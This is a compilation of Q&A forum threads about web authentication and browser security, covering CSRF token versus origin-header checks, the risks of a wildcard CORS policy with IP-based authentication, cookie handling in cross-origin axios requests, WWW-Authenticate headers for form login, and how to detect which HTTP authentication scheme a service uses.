CSRF synctoken vs origin,referreal url - csrf

Given that origin, referrer and host headers cannot be spoofed by javascript,
is there a strong reason to use synchronizer token pattern over just using origin, referrer and host headers for CSRF prevention on (POST, DELETE, PUT) requests ?

Related

Is allowing global CORS in my case security issue

I have rest api which is publicly available with REST API key authentication, but I want to allow private network to access api without authentication. Is it safe to add global CORS
Access-Control-Allow-Origin: *
Note that I am doing authentication in haproxy:
acl private_ip src -m reg -i (^127\\.0\\.0\\.1)|(^10.*)|(^172\\.1[6-9].*)|(^172\\.2[0-9].*)|(^172\\.3[0-1].*)|(^192\\.168.*)|(^::1$)|(^[fF][cCdD])|(0:0:0:0:0:0:0:1)
I read that setting CORS "*" could cause some security issues in case when there is IP authentication, but as I am not sure how "src" IP address in haproxy is obtained I can't be sure if this security risk is present in my case?
It is strongly recommended against to use IP authentication and a permissive CORS policy together.
CORS allows for script on a page served from one host to process a response from a call to a resource on another host when normally a well-behaved browser would stop script on the page from reading the response. For example where a page on webserver.com includes an AJAX call to a resource on api-server.com.
CORS is enforced by the browser, so if your attacker can make a call to your API then they are able to ignore your CORS header, and this is transitive to anything they can get another user to do by serving them a malicious page.
API authentication (whether by token or by IP) is a server-side protection that allows you to filter your response to the request. Consider the case where your attacker has access to your network. They can make a request to your API and your IP authentication lets them get the data. CORS is not the solution to that, but you of course secure your network well and only your users have access to it.
However, if the attacker controls a website (say, compromised.example.com) then they can send a user on your network a link to their page. When your user goes to the page, they are served a script that makes a call to your API. Because you permit the request based on IP, you provide the response.
This is where CORS comes in. If you have a header allowing '*' on your API responses, then the browser on your network will happily provide the requesting page (served from the attacker who is not on your network) with the response.
So the attacker has unauthenticated access to your API if they can get one of your network's users to browse to their malicious page and exfiltrate any responses that a user on your network can get.

Nuxt axios request without cookies specific uri

This project is on nuxtjs.
I don't think is important but maybe it can be some clue.
I need to get order detail information for using axios and below url.
/users/orders/d/20210806000349
but, very weird because axios doesn't request without cookies that url
of course i do set withCredentials: true already
when i change that url to /20210806000349 everyting is okay
someone help me about this?
I need more detail about domains but maybe api domain and nuxt domain are different. in this case you should care about CORS.
what is CORS
Cross-Origin Resource Sharing (CORS) is an HTTP-header based mechanism that allows a server to indicate any origins (domain, scheme, or port) other than its own from which a browser should permit loading of resources. CORS also relies on a mechanism by which browsers make a "preflight" request to the server hosting the cross-origin resource, in order to check that the server will permit the actual request. In that preflight, the browser sends headers that indicate the HTTP method and headers that will be used in the actual request.
MDN
what happen if you request to foreign domain?
user agent send an option request to foreign host
foreign host send response whit some header
user agent looks to Access-Control-Allow-Origin header and if its value is not equal to your domain block request
if request's withCredentials be true look at Access-Control-Allow-Credentials header and if its value be true send request with cookie. otherwise send request without cookie.
figure out myself
get request also preflight options request if domain is different
but in this case chrome doesn't show up options request
i check this on firefox

What WWW-Authenticate header should a http server return in a 401 response when using form-based authentication?

I have a web application with a Javascript part running on the browser. That frontend uses several HTTP endpoints (more or less REST). The frontend must be able to distinguish between 401 and 403 responses and must not receive the 3xx redirects usually used for human users.
Authorization is done with a plain form login (no Javascript involved there), then a session cookie is used (for both "REST" and normal requests).
What would be a correct value for the WWW-Authenticate header value?
From RFC 7235: "A server generating a 401 (Unauthorized) response MUST send a WWW-Authenticate header field containing at least one challenge."
The Hypertext Transfer Protocol (HTTP) Authentication Scheme Registry does not list any scheme for form-based authentication.
See also:
HTTP 401 Unauthorized when not using HTTP basic auth?
Authorization in RESTful HTTP API, 401 WWW-Authenticate
What would be a correct value for the WWW-Authenticate header value?
There's no point in returning 401 and WWW-Authenticate when you are not using HTTP Authentication as described in the RFC 7235. In HTTP Authentication, the client is expected to send the credentials in the Authorization header of the request with an authentication scheme token.
If you want to send the credentials in the request payload using POST, the 403 status code you be more suitable to indicate that the server has refused the request.
Since there is no standard challenge for this type of authentication, you are (as you predicted yourself) inventing your own.
I don't think there is a standard mechanism for specifying vendor tokens here, so I think the best thing you can do is use a token that's unlikely to clash with anything else.
Amazon has done this with AWS, and there's many others. My recommendation would be to use something like productname-schemename, for example acme-webauth.
In theory you should respond
HTTP/1.x 401 Unauthorized
WWW-Authenticate: cookie; cookie-name=my-session-cookie-name
However, real world internet browsers (user agents) do not really support this and in my experience the least bad option is to use HTTP status 403 for all of "Access Denied", "Unauthorized" or "Not allowed". If you have a REST service that's accessed with non-browser user-agents only, you could just follow the spec and return the above headers.
Also note that as described in RFC 7231 section 6.5.4 (https://www.rfc-editor.org/rfc/rfc7231#section-6.5.4) the server can respond with 404 for both "Access Denied" and "Not Found" so following should be okay for all user agents (browsers and standalone clients):
403 Unauthorized or Not allowed
404 Access Denied or Not Found
Or, you can just use 400 for any case because that should cause browser do fallback to generic error handling case. The HTTP status code 401 is especially problematic because it historically meant (at least in practice) that Basic Realm authentication is in use and the submitted HTTP header Authorization was not accepted. Because you cannot submit the session cookie via that header with commonly available browsers, those browsers have trouble handling 401 correctly when you use cookies for authentication. (According to the spec, HTTP 401 MUST include header WWW-Authenticate which should be used to figure out correct handling by the user agent but this doesn't seem to happen in reality with browsers.)
There is no HTTP authentication scheme for form based authentication.
Browsers implement basic, digest, etc. by showing a pop up where you can enter credentials.

Cross Origin calls from curl working without needed headers

I am invoking one of my APIs using curl as follows(cross origin).
curl -H "Origin: foo.com" -H "Content-Type: application/json" -H "Authorization: Basic YWRtaW46YWRtaW4=" -v https://localhost:9443/api/v10/configs -k
I have not set the necessary cross origin headers in the server side. But the API call works. Why is that?
on server side API class, in the options call I am only setting the Allow header.
#OPTIONS
public Response options() {
return Response.ok().header(HttpHeaders.ALLOW, "GET").build();
}
The following headers are not set.
Access-Control-Allow-Methods:
Access-Control-Allow-Origin:
Access-Control-Allow-Headers:
CORS is a mechanism to enable cross domain requests but in the browser using AJAX. If you use curl you can do what you want ;-)
So in your case (using curl), you try to execute the request outside a browser. So you are free to do what you want! With curl, the request will be always executed and you will see the exchanged headers for example. This can be something helpful to see if you have the expected headers for CORS...
Hope it helps you,
Thierry
You may want to read HTTP access control (CORS) to get a better understanding of how it works, and the main purpose it serves.
Just some into snippet
For security reasons, browsers restrict cross-origin HTTP requests initiated from within scripts. For example, XMLHttpRequest follows the same-origin policy. So, a web application using XMLHttpRequest could only make HTTP requests to its own domain. To improve web applications, developers asked browser vendors to allow XMLHttpRequest to make cross-domain requests.
The W3C Web Applications Working Group recommends the new Cross-Origin Resource Sharing (CORS) mechanism. CORS gives web servers cross-domain access controls, which enable secure cross-domain data transfers. Modern browsers use CORS in an API container - such as XMLHttpRequest - to mitigate risks of cross-origin HTTP requests.
So CORS was introduced to allow for cross-domain access (from scripts) in browsers. How it works is that when a a request is made that requires cross-domain authorization, the browser first makes an OPTIONS ("preflight") request to look for the access response headers. If they are there, then it make the initial request. Otherwise there is a request error.
As an aside, I would avoid implementing CORS support in resource methods. I would instead use a filter mechanism so all requests are handled in the filter, instead of having to implement an #OPTIONS method for all endpoints.

determining web http authentication methods

How do you determine if a REST webservice is using Basic, Kerberos, NTLM, or one of the many other authentication methods?
When you send an unauthenticated request the service has to respond with a "HTTP/1.1 401 Unauthorized" and the response contains a WWW-Authenticate header that specifies what authentication scheme is expected (Basic, Digest), the security realm and any other specific value (like Digets's nonce). So if the server responds with:
HTTP/1.0 401 Unauthorized
WWW-Authenticate: Digest realm="example.com",
qop="auth,auth-int",
nonce="...",
opaque="..."
it wants a Digest authentication. If the response looks like:
HTTP/1.0 401 Unauthorized
WWW-Authenticate: Basic realm="example.com"
then it wants a Basic authentication. Some (poorly) implemented servers/sites don't handle the Basic correctly and respond directly with 403 Forbidden instead of challenging first.
NTLM is similar in as the server reponds with a 401 and a WWW-Authenticate header with the value NTLM, but there is no official public spec for it, since is Microsoft proprietary. There are various reverse engineered descriptions.
Unfortunately REST does not come with a WSDL style description of service to discover the authentication scheme used a priori.
You send it a request, presumably get an HTTP 401 code, and look at the WWW-Authenticate header that (per RFC 2616) the response MUST include. If instead you get a 403 or some other weird status, or a missing WWW-Authenticate header, you curse at website authors that don't follow the core HTTP RFC, and start sniffing the traffic to try to reverse engineer what nonstandard mess they've done this time;-).
If it's a black box scenario, I usually connect with Fiddler, and inspect the actual traffic.